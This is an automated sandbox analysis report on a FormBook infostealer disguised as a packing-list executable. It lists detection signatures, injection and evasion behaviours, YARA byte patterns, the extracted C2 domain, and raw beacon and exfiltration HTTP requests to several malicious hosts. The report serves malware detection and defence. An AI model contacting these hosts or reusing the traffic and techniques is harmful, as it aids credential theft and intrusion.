Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PI & PACKING LIST.exe

Overview

General Information

Sample Name:PI & PACKING LIST.exe
Analysis ID:756334
MD5:36fbb21511e87e8dddc8916cc2dc9367
SHA1:eda2fa3fe4b62fe3d564cf492cc31a875e8f1922
SHA256:937c7c476bb363e55fdf1ff275c87de91ec0f550072e9a759387cc95e6c78c83
Tags:exeformbook
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Deletes itself after installation
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • PI & PACKING LIST.exe (PID: 6140 cmdline: C:\Users\user\Desktop\PI & PACKING LIST.exe MD5: 36FBB21511E87E8DDDC8916CC2DC9367)
    • PI & PACKING LIST.exe (PID: 5216 cmdline: C:\Users\user\Desktop\PI & PACKING LIST.exe MD5: 36FBB21511E87E8DDDC8916CC2DC9367)
    • PI & PACKING LIST.exe (PID: 2352 cmdline: C:\Users\user\Desktop\PI & PACKING LIST.exe MD5: 36FBB21511E87E8DDDC8916CC2DC9367)
      • explorer.exe (PID: 3452 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • control.exe (PID: 5228 cmdline: C:\Windows\SysWOW64\control.exe MD5: 40FBA3FBFD5E33E0DE1BA45472FDA66F)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.singglostudio.com/m5oe/"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000000.345082941.000000001030A000.00000040.00000001.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000003.00000000.345082941.000000001030A000.00000040.00000001.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x100a0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x8df7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
    00000003.00000000.345082941.000000001030A000.00000040.00000001.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x8bf5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x86a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x8cf7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x8e6f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x78ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xee17:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0xfe0a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000003.00000000.345082941.000000001030A000.00000040.00000001.00040000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0xb119:$sqlite3step: 68 34 1C 7B E1
    • 0xbc91:$sqlite3step: 68 34 1C 7B E1
    • 0xb15b:$sqlite3text: 68 38 2A 90 C5
    • 0xbcd6:$sqlite3text: 68 38 2A 90 C5
    • 0xb172:$sqlite3blob: 68 53 D8 7F 8C
    • 0xbcec:$sqlite3blob: 68 53 D8 7F 8C
    0000000D.00000002.512821683.0000000003510000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      Click to see the 24 entries

      Sigma Signatures

      No Sigma rule has matched

      Snort Signatures

      No Snort rule has matched

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Multi AV Scanner detection for submitted file
      Source: PI & PACKING LIST.exeReversingLabs: Detection: 76%
      Source: PI & PACKING LIST.exeVirustotal: Detection: 57%Perma Link
      Yara detected FormBook
      Source: Yara matchFile source: 00000003.00000000.345082941.000000001030A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000D.00000002.512821683.0000000003510000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000000.326684434.000000001030A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.353260864.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000D.00000002.512567942.0000000001330000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000D.00000002.509273886.0000000000EC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Antivirus detection for URL or domain
      Source: http://www.cpitherapy.com/m5oe/?l48xI=Kdt0ttn6jBvm5dVCPGsq4sF6gZwVhJORDr+IW0q2lJvFs7kzNd/E4xjIZ8hkWN2nAiXaUCaRapMtLMo79OBUYLpofMwqWu/G3g==&y8dt=cR-TJP3pr48Avira URL Cloud: Label: malware
      Source: http://www.zkjk888.com/m5oe/?l48xI=lXL2hA4gPGXGkrsXCHLs63wEyc6+ZxTcosJkE7OIAbbgzBCGQ1RLZhLXXwLUr0PxIclnwkI7OF+QM6Klss4VWWvRg6rabD2uNg==&y8dt=cR-TJP3pr48Avira URL Cloud: Label: malware
      Source: http://www.bengalindex.com/m5oe/Avira URL Cloud: Label: malware
      Source: http://www.nu2uresale.store/m5oe/?l48xI=U9+cid+ik5YJF3jF27GFdJRqVXeG7FP+UvbSj6ZytGipCLvwOYSuUs/u1hqVfurTuH6/pVSyY1dCVh8DyPcg4wzd/AwTcksoYQ==&y8dt=cR-TJP3pr48Avira URL Cloud: Label: malware
      Source: http://www.nu2uresale.store/m5oe/Avira URL Cloud: Label: malware
      Source: http://www.p-soils.com/m5oe/?l48xI=OgbUJyD2Cs0iavfQBCvIOQvZdrfaRUMlkbnSDVoQDO79KZkwY+JyOZ2XW8xl2hee24/cs1yqqL6PnYlAwwwxD54r6/IzPRoMsg==&y8dt=cR-TJP3pr48Avira URL Cloud: Label: malware
      Source: http://www.bengalindex.com/m5oe/?l48xI=yrQlZi/yeQekXtziTibn9LfL5FHN0Y47PbY+gegrHfqcLEwJAZ2lhKdA1OTtZbcFcNKVJgIODn1wmw2XGX+PWpMZIoIdVyV5wA==&y8dt=cR-TJP3pr48Avira URL Cloud: Label: malware
      Source: http://www.p-soils.com/m5oe/Avira URL Cloud: Label: malware
      Source: http://www.cpitherapy.com/m5oe/Avira URL Cloud: Label: malware
      Machine Learning detection for sample
      Source: PI & PACKING LIST.exeJoe Sandbox ML: detected
      Source: 0000000D.00000002.512821683.0000000003510000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.singglostudio.com/m5oe/"]}
      Source: PI & PACKING LIST.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: PI & PACKING LIST.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: wntdll.pdbUGP source: PI & PACKING LIST.exe, 00000002.00000002.354114112.0000000001210000.00000040.00000800.00020000.00000000.sdmp, PI & PACKING LIST.exe, 00000002.00000003.260987211.0000000001072000.00000004.00000800.00020000.00000000.sdmp, PI & PACKING LIST.exe, 00000002.00000003.259137326.0000000000EDE000.00000004.00000800.00020000.00000000.sdmp, control.exe, 0000000D.00000002.514714921.0000000004EB0000.00000040.00000800.00020000.00000000.sdmp, control.exe, 0000000D.00000003.353323429.0000000004B74000.00000004.00000800.00020000.00000000.sdmp, control.exe, 0000000D.00000002.515759584.0000000004FCF000.00000040.00000800.00020000.00000000.sdmp, control.exe, 0000000D.00000003.355819858.0000000004D15000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: wntdll.pdb source: PI & PACKING LIST.exe, PI & PACKING LIST.exe, 00000002.00000002.354114112.0000000001210000.00000040.00000800.00020000.00000000.sdmp, PI & PACKING LIST.exe, 00000002.00000003.260987211.0000000001072000.00000004.00000800.00020000.00000000.sdmp, PI & PACKING LIST.exe, 00000002.00000003.259137326.0000000000EDE000.00000004.00000800.00020000.00000000.sdmp, control.exe, 0000000D.00000002.514714921.0000000004EB0000.00000040.00000800.00020000.00000000.sdmp, control.exe, 0000000D.00000003.353323429.0000000004B74000.00000004.00000800.00020000.00000000.sdmp, control.exe, 0000000D.00000002.515759584.0000000004FCF000.00000040.00000800.00020000.00000000.sdmp, control.exe, 0000000D.00000003.355819858.0000000004D15000.00000004.00000800.00020000.00000000.sdmp

      Networking

      barindex
      System process connects to network (likely due to code injection or exploit)
      Source: C:\Windows\explorer.exeNetwork Connect: 35.78.89.117 80
      Source: C:\Windows\explorer.exeNetwork Connect: 162.43.120.154 80
      Source: C:\Windows\explorer.exeNetwork Connect: 142.250.203.115 80
      Source: C:\Windows\explorer.exeDomain query: www.bengalindex.com
      Source: C:\Windows\explorer.exeDomain query: www.nu2uresale.store
      Source: C:\Windows\explorer.exeNetwork Connect: 209.99.64.33 80
      Source: C:\Windows\explorer.exeDomain query: www.zkjk888.com
      Source: C:\Windows\explorer.exeNetwork Connect: 178.128.239.245 80
      Source: C:\Windows\explorer.exeDomain query: www.p-soils.com
      Source: C:\Windows\explorer.exeDomain query: www.cpitherapy.com
      Source: C:\Windows\explorer.exeDomain query: www.gebouwpas.online
      C2 URLs / IPs found in malware configuration
      Source: Malware configuration extractorURLs: www.singglostudio.com/m5oe/
      Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
      Source: global trafficHTTP traffic detected: GET /m5oe/?l48xI=lXL2hA4gPGXGkrsXCHLs63wEyc6+ZxTcosJkE7OIAbbgzBCGQ1RLZhLXXwLUr0PxIclnwkI7OF+QM6Klss4VWWvRg6rabD2uNg==&y8dt=cR-TJP3pr48 HTTP/1.1Host: www.zkjk888.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /m5oe/?l48xI=Kdt0ttn6jBvm5dVCPGsq4sF6gZwVhJORDr+IW0q2lJvFs7kzNd/E4xjIZ8hkWN2nAiXaUCaRapMtLMo79OBUYLpofMwqWu/G3g==&y8dt=cR-TJP3pr48 HTTP/1.1Host: www.cpitherapy.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /m5oe/?l48xI=OgbUJyD2Cs0iavfQBCvIOQvZdrfaRUMlkbnSDVoQDO79KZkwY+JyOZ2XW8xl2hee24/cs1yqqL6PnYlAwwwxD54r6/IzPRoMsg==&y8dt=cR-TJP3pr48 HTTP/1.1Host: www.p-soils.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /m5oe/?l48xI=yrQlZi/yeQekXtziTibn9LfL5FHN0Y47PbY+gegrHfqcLEwJAZ2lhKdA1OTtZbcFcNKVJgIODn1wmw2XGX+PWpMZIoIdVyV5wA==&y8dt=cR-TJP3pr48 HTTP/1.1Host: www.bengalindex.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /m5oe/?l48xI=U9+cid+ik5YJF3jF27GFdJRqVXeG7FP+UvbSj6ZytGipCLvwOYSuUs/u1hqVfurTuH6/pVSyY1dCVh8DyPcg4wzd/AwTcksoYQ==&y8dt=cR-TJP3pr48 HTTP/1.1Host: www.nu2uresale.storeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: POST /m5oe/ HTTP/1.1Host: www.cpitherapy.comConnection: closeContent-Length: 187Cache-Control: no-cacheOrigin: http://www.cpitherapy.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.cpitherapy.com/m5oe/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6c 34 38 78 49 3d 48 66 46 55 75 59 66 47 6f 41 36 38 37 5f 73 34 4d 6c 67 48 78 4f 42 34 6c 5a 30 4e 6d 37 6a 72 4b 34 71 4a 48 45 36 63 78 34 47 33 69 4b 64 52 45 70 44 54 28 78 50 6f 66 61 6c 57 61 75 43 6f 4f 58 48 42 65 69 37 48 45 36 30 67 44 4e 41 6d 31 4e 78 32 58 61 34 63 63 64 77 33 43 64 48 61 77 6f 54 35 43 47 7a 5a 51 78 56 49 38 46 71 5f 34 76 6c 57 6d 62 35 36 6d 71 48 6c 74 70 66 6d 69 58 72 36 56 31 70 6b 4d 41 48 77 4f 70 6f 51 6f 61 63 61 72 33 77 6a 4a 64 4a 56 41 33 32 5a 47 32 67 6b 6f 6f 34 49 4c 69 28 49 37 32 43 45 5a 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: l48xI=HfFUuYfGoA687_s4MlgHxOB4lZ0Nm7jrK4qJHE6cx4G3iKdREpDT(xPofalWauCoOXHBei7HE60gDNAm1Nx2Xa4ccdw3CdHawoT5CGzZQxVI8Fq_4vlWmb56mqHltpfmiXr6V1pkMAHwOpoQoacar3wjJdJVA32ZG2gkoo4ILi(I72CEZw).
      Source: global trafficHTTP traffic detected: POST /m5oe/ HTTP/1.1Host: www.cpitherapy.comConnection: closeContent-Length: 5335Cache-Control: no-cacheOrigin: http://www.cpitherapy.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.cpitherapy.com/m5oe/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6c 34 38 78 49 3d 48 66 46 55 75 59 66 47 6f 41 36 38 36 66 63 34 4e 47 34 48 6b 65 42 37 67 5a 30 4e 76 62 6a 76 4b 34 6d 4a 48 42 43 32 79 4b 71 33 69 62 4e 52 44 4e 6a 54 6b 78 50 6f 4f 36 6b 64 65 75 44 74 4f 58 36 36 65 6a 4b 38 45 34 34 67 43 66 34 6d 79 74 78 31 56 36 34 49 52 39 77 30 4e 39 48 61 77 6f 65 57 43 48 79 73 51 78 64 49 38 33 69 5f 34 74 39 5a 6d 4c 35 42 70 4b 48 6c 74 70 44 58 69 58 72 41 56 31 51 76 4d 42 6e 77 63 4b 77 51 6b 72 63 56 73 6e 77 67 44 39 49 59 50 45 72 4c 41 45 73 56 67 75 30 4e 63 6e 57 4a 37 43 54 39 4e 6a 41 49 57 4d 59 38 4b 59 4b 46 38 35 44 4d 5a 51 59 68 38 50 6d 6f 59 50 4d 75 57 43 73 74 36 64 68 38 74 2d 59 53 36 48 56 4c 76 54 65 70 58 74 66 7a 6f 35 49 66 45 4f 63 6a 78 35 6f 46 30 61 35 50 6d 73 57 54 37 62 64 41 77 31 38 46 56 36 53 49 38 79 59 71 28 77 75 4b 7a 2d 68 71 32 65 71 4b 4b 51 56 5a 41 46 6c 75 39 59 6d 31 5a 74 69 45 6e 4d 7e 51 77 30 35 54 79 73 5a 67 52 7a 4b 4e 47 66 78 33 76 6f 4b 53 6d 74 70 50 32 59 53 44 44 61 33 79 4c 45 6f 73 61 4e 4f 2d 37 53 78 58 73 6c 35 71 57 4a 71 67 6a 70 59 52 33 57 4c 54 54 79 6f 6e 58 45 47 6d 5a 33 79 69 69 37 42 36 6b 47 4f 65 76 30 76 4c 30 34 6c 74 62 53 55 65 48 69 6b 73 36 6c 49 54 49 73 57 5a 7a 51 32 65 4e 48 76 72 6d 6d 70 73 43 73 77 68 7e 55 71 36 56 35 74 50 4a 55 4f 58 67 6b 78 59 77 49 43 2d 47 41 51 69 50 4d 38 53 6f 50 70 4a 39 37 61 54 38 34 6b 36 76 4d 51 4f 32 32 46 42 6e 50 4c 52 70 5a 34 44 5a 64 30 65 6a 6b 6f 6b 35 47 58 4c 6c 47 59 55 49 47 28 53 51 38 6a 5a 74 66 64 4c 35 66 4d 69 72 6a 53 6f 53 33 33 55 6a 4e 58 5a 47 74 34 4a 53 62 44 4c 5a 50 5a 54 48 54 6c 30 57 43 6d 5f 28 41 5a 31 6a 47 59 47 53 4c 4d 44 53 4d 68 30 36 63 63 53 34 68 6c 75 6d 70 43 31 46 52 39 68 58 74 68 54 57 37 49 67 6c 4c 46 66 64 6f 36 49 79 43 71 64 38 6f 47 4e 4f 72 4d 65 57 58 73 70 4a 58 4a 4c 4c 71 45 51 48 38 31 6d 31 5a 5a 58 38 51 6b 44 36 58 6f 47 56 63 69 6c 36 4d 6d 58 6c 71 47 35 42 2d 53 4d 56 67 35 72 38 42 51 4a 59 70 72 44 6c 6a 47 55 51 74 57 79 6c 37 38 54 4c 45 49 66 31 33 76 7a 78 39 41 35 41 4f 50 37 75 2d 66 79 7e 56 52 78 62 35 63 56 53 63 74 51 4b 4c 70 59 48 64 32 52 4f 31 79 59 6a 6e 46 2d 6b 59 67 35 4b 43 63 36 79 31 71 71 44 51 51 33 6d 6b 72 4f 53 65 69 2d 7e 6f 53 75 7a 33 35 73 33 71 68 52 79 75 37 73 63 78 6a 36 75 46 57 52 66 38 79 47 7a 5a 48 36 66 70 35 46 47 79 31 66 67 57 50 65 63 53 4a 39 30 30 28 7a 76 68 62 6a 67 64 79 72 4c 42 4f 33 53 55 61 7a 7e 7a 56 7a 33 57 44 42 54 64 55 45 6e 77 73 54 45 69 46 53 49 71 6c 50 47 75 4e 56 6c 4a 51 71 38 72 7e 37 58 5f 70 58 6f 69 78 70 31 39 69 55 58 64 39 33 78 5f 6
      Source: global trafficHTTP traffic detected: POST /m5oe/ HTTP/1.1Host: www.p-soils.comConnection: closeContent-Length: 187Cache-Control: no-cacheOrigin: http://www.p-soils.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.p-soils.com/m5oe/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6c 34 38 78 49 3d 44 69 7a 30 4b 45 43 77 56 65 4a 57 66 66 65 6d 4a 33 62 33 47 78 48 4b 58 75 6e 49 56 6d 31 33 70 6f 44 34 4c 6c 46 46 51 75 33 33 41 59 45 72 65 38 39 31 46 72 7e 61 55 49 31 37 31 32 76 6b 77 4c 54 48 6e 48 6d 53 6f 72 43 49 6a 34 42 36 37 6a 41 44 4e 61 51 30 7a 2d 6c 4d 4b 48 46 62 30 58 4d 66 36 67 57 66 7e 67 62 6c 4c 58 76 6c 41 36 64 57 6c 4a 64 56 7e 61 6f 37 34 6e 4a 79 69 30 68 52 32 6e 30 33 76 34 77 6f 43 6a 7e 70 78 72 4d 79 75 6e 37 53 49 53 57 5f 59 67 52 46 37 7a 72 54 6e 61 56 36 73 6e 77 50 5a 32 75 49 34 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: l48xI=Diz0KECwVeJWffemJ3b3GxHKXunIVm13poD4LlFFQu33AYEre891Fr~aUI1712vkwLTHnHmSorCIj4B67jADNaQ0z-lMKHFb0XMf6gWf~gblLXvlA6dWlJdV~ao74nJyi0hR2n03v4woCj~pxrMyun7SISW_YgRF7zrTnaV6snwPZ2uI4w).
      Source: global trafficHTTP traffic detected: POST /m5oe/ HTTP/1.1Host: www.p-soils.comConnection: closeContent-Length: 5335Cache-Control: no-cacheOrigin: http://www.p-soils.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.p-soils.com/m5oe/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6c 34 38 78 49 3d 44 69 7a 30 4b 45 43 77 56 65 4a 57 66 2d 75 6d 4b 51 76 33 52 68 47 34 62 4f 6e 49 65 47 30 38 70 6f 50 34 4c 6e 6f 65 51 63 37 33 44 4b 73 72 5a 66 56 31 44 72 7e 61 42 59 31 5f 28 57 76 79 77 49 75 38 6e 46 4f 6b 6f 74 61 49 69 71 70 36 28 44 41 41 4f 36 51 31 79 4f 6b 61 53 6e 46 62 30 58 4a 6a 36 68 57 50 7e 67 6a 6c 4c 45 33 6c 41 38 4a 56 33 70 64 55 79 36 6f 37 34 6e 56 78 69 30 67 6d 32 6e 74 73 76 35 51 6f 44 32 36 70 69 75 67 74 70 33 37 56 42 79 58 39 52 79 73 63 28 67 6a 55 69 4a 5a 5f 75 53 52 59 4e 56 53 44 74 47 41 46 44 6c 41 79 4a 39 73 45 6d 7a 47 6a 73 38 47 51 59 64 5a 38 45 73 32 2d 37 65 58 71 51 72 33 65 52 63 4d 38 39 50 47 31 64 56 78 63 6e 53 39 4b 4f 70 79 74 30 55 61 69 54 5a 52 37 6c 41 65 36 78 55 63 70 5a 5a 66 49 37 4d 67 71 38 53 34 41 56 68 59 50 78 36 66 37 39 49 69 45 75 36 4f 61 67 50 7a 4c 32 73 41 6a 56 66 4c 56 65 76 38 66 6a 4b 70 43 47 6c 46 77 69 6e 68 52 52 4e 4a 58 69 57 50 78 43 31 77 41 45 58 63 6d 59 71 78 70 75 4f 58 55 4a 44 36 35 79 7a 38 39 31 43 46 70 71 63 4b 72 43 4a 4b 30 50 36 67 68 39 70 48 73 47 2d 49 51 32 30 56 35 6c 46 36 67 75 30 35 75 6b 4c 77 78 44 44 68 55 79 78 58 45 4b 78 54 6c 32 32 37 30 45 6d 59 73 76 55 30 78 4a 65 30 61 77 52 79 62 30 36 7a 4b 31 5f 66 79 28 46 52 50 31 6c 64 76 6e 72 5a 32 4a 4e 4a 37 50 42 4f 5a 36 5f 75 43 42 55 33 66 69 30 44 46 79 31 76 55 77 65 65 55 6d 4a 32 42 46 4a 70 79 56 51 32 62 6d 4f 7e 43 35 6f 78 4c 62 72 71 6c 52 74 6a 47 4d 49 7a 77 67 4e 28 50 70 67 28 51 34 42 31 55 71 31 51 33 6c 76 52 6d 30 51 46 69 70 37 76 37 6f 6f 4d 70 63 6d 77 56 52 79 7e 39 4e 79 37 75 59 73 57 46 74 44 65 46 78 47 31 64 4d 78 43 52 33 33 54 76 37 79 73 2d 7a 67 4d 69 44 38 77 72 72 77 58 33 49 42 39 74 55 38 70 75 4c 66 74 31 5a 57 77 74 63 63 55 74 45 37 34 49 36 50 56 56 45 35 6d 44 62 70 31 43 38 70 6b 35 6a 68 6e 59 69 43 65 52 63 77 70 52 28 44 6d 53 69 69 58 74 44 4a 54 5a 38 74 65 79 59 76 39 6f 70 76 4c 5f 72 6f 57 32 39 48 56 66 68 44 6a 68 38 74 79 77 49 65 33 63 47 34 36 65 6a 6c 34 55 36 59 57 79 71 34 77 75 76 70 30 6c 34 4e 45 71 77 65 49 73 6d 45 7e 6f 30 74 6d 56 4a 74 34 2d 6c 43 64 69 57 2d 6b 45 50 4e 48 57 57 69 4d 68 70 33 6b 48 78 35 78 6e 74 39 57 52 73 62 61 49 4a 56 7a 63 70 6a 4b 41 77 37 64 6a 4a 6e 5a 72 74 56 45 64 34 65 75 77 69 4d 6d 42 56 48 59 4f 67 42 77 77 59 6f 69 56 47 31 6a 65 55 68 54 68 4b 32 4a 67 4a 54 48 6d 36 39 64 34 4c 4e 78 68 53 31 50 6f 6f 75 62 62 6d 54 4d 42 4c 42 38 66 67 30 71 39 4d 5f 6c 57 49 51 7a 46 63 4b 7a 57 36 73 4e 70 6c 4b 51 44 6a 68 38 78 57 69 46 67 6c 7a 28 6d 74 62 52 36 6c 44 6d 74 35 6
      Source: global trafficHTTP traffic detected: POST /m5oe/ HTTP/1.1Host: www.bengalindex.comConnection: closeContent-Length: 187Cache-Control: no-cacheOrigin: http://www.bengalindex.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.bengalindex.com/m5oe/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6c 34 38 78 49 3d 28 70 34 46 61 58 6e 62 4c 56 54 41 57 64 43 51 54 77 72 6b 31 4b 36 2d 6f 7a 66 4a 37 4e 64 30 48 39 4d 6c 76 50 77 64 63 62 32 33 50 6e 34 4d 4d 72 43 56 6a 64 6c 45 31 35 62 33 65 34 31 57 5a 50 61 61 42 67 45 77 62 57 5a 71 30 43 7e 43 57 43 72 61 65 49 34 6d 51 4d 38 63 49 7a 34 77 77 36 30 65 58 56 51 6d 35 57 79 53 42 78 48 66 4c 73 43 68 70 4f 55 6b 54 39 28 52 68 68 31 70 45 49 7a 73 52 78 54 46 46 4d 58 4e 46 4d 68 79 6c 6f 4a 46 61 65 65 67 54 65 6c 33 4e 42 77 58 50 42 52 6e 42 4f 78 68 63 76 72 67 6b 78 41 50 7e 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: l48xI=(p4FaXnbLVTAWdCQTwrk1K6-ozfJ7Nd0H9MlvPwdcb23Pn4MMrCVjdlE15b3e41WZPaaBgEwbWZq0C~CWCraeI4mQM8cIz4ww60eXVQm5WySBxHfLsChpOUkT9(Rhh1pEIzsRxTFFMXNFMhyloJFaeegTel3NBwXPBRnBOxhcvrgkxAP~w).
      Source: global trafficHTTP traffic detected: POST /m5oe/ HTTP/1.1Host: www.bengalindex.comConnection: closeContent-Length: 5335Cache-Control: no-cacheOrigin: http://www.bengalindex.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.bengalindex.com/m5oe/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6c 34 38 78 49 3d 28 70 34 46 61 58 6e 62 4c 56 54 41 57 2d 61 51 66 33 28 6b 6b 71 36 5f 78 44 66 4a 77 74 64 4b 48 39 49 6c 76 50 59 4e 66 74 4f 33 42 56 51 4d 4e 49 71 56 68 64 6c 45 6b 70 62 7a 42 6f 30 4e 5a 50 4f 38 42 69 4d 5f 62 55 31 71 79 41 32 43 42 53 72 62 58 49 34 37 44 38 38 66 57 44 34 77 77 36 34 6f 58 58 34 63 35 57 71 53 41 47 48 66 4c 75 71 2d 76 65 55 6e 4d 4e 28 52 68 68 70 79 45 49 79 52 52 78 72 72 46 4d 33 4e 58 71 4e 79 32 4e 39 47 4e 65 66 6f 65 2d 6b 61 4d 78 67 65 61 67 70 4b 4c 5f 64 67 62 34 6e 79 73 68 56 6f 69 49 32 4d 52 6f 52 41 57 76 41 36 30 2d 41 4b 73 6d 74 50 38 4a 71 68 66 5a 30 45 28 6e 69 6f 4d 55 35 46 69 62 65 38 52 35 75 64 5a 48 4e 72 73 51 41 41 54 79 52 58 41 4f 70 35 34 6b 28 66 55 71 63 6e 42 43 79 74 46 2d 73 66 63 4e 33 6f 5a 5a 6a 61 5a 50 6d 41 43 61 28 35 32 36 4c 78 5a 68 66 62 7e 7a 51 52 75 46 74 55 38 43 76 73 62 6d 77 51 4c 53 70 4e 45 4a 68 68 78 43 36 52 45 6c 6f 31 28 43 4e 51 32 6b 6e 5a 46 73 41 53 78 36 41 59 43 41 72 62 4d 6f 6b 77 74 4f 6e 71 57 58 67 38 66 78 4e 32 78 6c 28 45 52 5a 38 70 33 2d 76 59 6b 51 51 41 66 73 7e 55 7e 4f 4f 41 36 6e 74 4a 41 64 77 77 35 6e 67 48 45 6f 38 75 49 62 4a 33 6e 67 76 76 33 74 58 63 73 6c 30 45 53 64 41 67 57 6e 62 74 63 30 49 65 38 30 6d 79 77 7a 68 42 4f 71 66 77 74 55 6f 36 68 51 5a 32 77 45 32 45 63 52 65 33 36 5f 63 54 53 70 79 70 61 48 7e 53 58 7a 55 55 5a 4b 39 78 32 5f 42 6b 52 2d 36 79 37 41 48 62 52 61 77 54 63 6e 45 5f 59 38 68 68 39 61 6e 6b 6f 6f 4f 52 33 30 63 77 70 76 64 47 69 38 63 35 35 69 48 41 67 47 35 2d 4f 2d 38 61 30 48 73 62 6c 30 56 6c 44 35 48 6b 52 47 4a 35 6f 62 46 64 78 39 6b 55 59 4b 28 70 69 70 28 74 71 63 4a 76 41 72 76 35 6a 5f 4d 51 45 6e 39 30 59 38 6e 69 45 69 30 70 7e 6a 6f 48 51 74 63 71 6b 2d 6a 2d 5a 6e 4c 5a 44 48 39 78 6a 77 74 75 49 4e 6f 36 78 50 44 67 38 6b 53 37 28 4e 46 74 74 58 47 36 37 30 43 45 7e 4e 69 73 66 36 74 51 7a 79 65 5f 5a 55 79 65 43 53 44 4c 30 66 65 52 76 39 42 66 71 34 74 38 45 67 4b 61 68 4d 78 62 77 6f 64 34 4d 4f 45 58 51 71 71 47 48 34 42 32 6d 72 31 44 47 